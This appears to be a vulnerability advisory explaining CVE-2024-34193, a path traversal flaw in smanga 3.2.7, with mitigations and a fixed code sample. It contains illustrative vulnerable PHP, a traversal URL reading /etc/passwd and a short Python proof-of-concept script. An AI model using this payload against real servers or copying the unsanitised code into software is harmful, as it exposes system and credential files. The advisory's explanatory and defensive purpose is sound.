CVE CyberSecurity Database News

CVE-2024-34193 - Path Traversal Vulnerability in smanga 3.2.7 Lets Attackers Read Any File

Poster -

A new security issue has been discovered in smanga version 3.2.7, a popular manga CMS. This vulnerability, registered as CVE-2024-34193, allows attackers to read any file from the server where smanga is installed. This is possible due to missing filters in the file parameter in the PHP/get_file_flow.php script, which results in a classic path traversal bug.

If you are running smanga 3.2.7 or below, you are at risk. This post will explain what the vulnerability is, how it works (with code examples), and how an attacker might use it to read your server files.

What is Path Traversal?

Path traversal is a type of security flaw where input provided by a user is not properly checked, letting the user access files and directories that are outside the intended folder. This can expose sensitive files like configuration files, credentials, logs, and more.

Where’s the Problem?

In smanga 3.2.7, there's a PHP script:
PHP/get_file_flow.php
This script is supposed to help users download or stream files (like manga chapters). But it doesn't properly sanitize or validate the file parameter that is passed from the client (like your browser).

Here is an example of what the code might look like inside get_file_flow.php

<?php
// Example vulnerable code in PHP
if (isset($_GET['file'])) {
    $file = $_GET['file']; // No filtering, dangerous!
    $file_path = "/var/www/smanga/files/" . $file;
    if (file_exists($file_path)) {
        readfile($file_path);
    } else {
        echo "File does not exist.";
    }
}
?>

What's wrong here?
The script takes user input from $_GET['file'] and mashes it directly onto a base path. Nothing stops a hacker from supplying values like ../../../../etc/passwd to break out of the intended folder.

Suppose the website is at https://example.com. An attacker can try

https://example.com/PHP/get_file_flow.php?file=../../../../etc/passwd

- ../../../../etc/passwd walks up out of the files directory and tries to fetch the Linux password file.
- If the web server's permissions allow it, the contents of /etc/passwd are sent directly back to the attacker's browser.

What Can Be Accessed?

- /etc/passwd (usernames, maybe more in badly configured systems)

Here’s a Python script to demonstrate exploiting this vulnerability

import requests

# URL of the vulnerable smanga site
url = "https://victim.com/PHP/get_file_flow.php";
# Target file to read
payload = "../../../../etc/passwd"

params = {
    'file': payload
}

response = requests.get(url, params=params)
print(response.text)  # Should show the contents if vulnerable

If you manage a site using smanga, do the following immediately

1. Upgrade: Check for an update or patch from the smanga official site.
2. Sanitize Input: Make sure any place where user input is used in file paths is sanitized. Use tools like basename(), remove ../ sequences, and whitelist allowed file names/extensions.
3. Least Privilege: Make sure your web server user can only read what it absolutely needs—never system files.
4. Monitor: Look for strange access in your logs to files like /etc/passwd, config.php, or other sensitive files.

Example: Safe Code Fix

<?php
if (isset($_GET['file'])) {
    $file = basename($_GET['file']);  // Only allow filenames, not paths
    $file_path = "/var/www/smanga/files/" . $file;
    if (file_exists($file_path)) {
        readfile($file_path);
    } else {
        echo "File does not exist.";
    }
}
?>

References

- NVD Listing for CVE-2024-34193
- Original smanga Repository
- OWASP Path Traversal Cheat Sheet
- Common PHP Security Pitfalls

Final Thoughts

Vulnerabilities like CVE-2024-34193 happen often when developer forgets to carefully handle user input. If you build or manage PHP applications (or any CMS), never trust user input with file names or paths. Always sanitize, validate, and use the principle of least privilege on your servers.

Stay safe and keep your systems updated!

Author's Note:
This information is published exclusively for legal, educational, and defensive research purposes. Do not misuse it. If you are a site owner, patch ASAP!

Timeline

Published on: 05/20/2024 18:15:10 UTC
Last modified on: 08/20/2024 15:35:11 UTC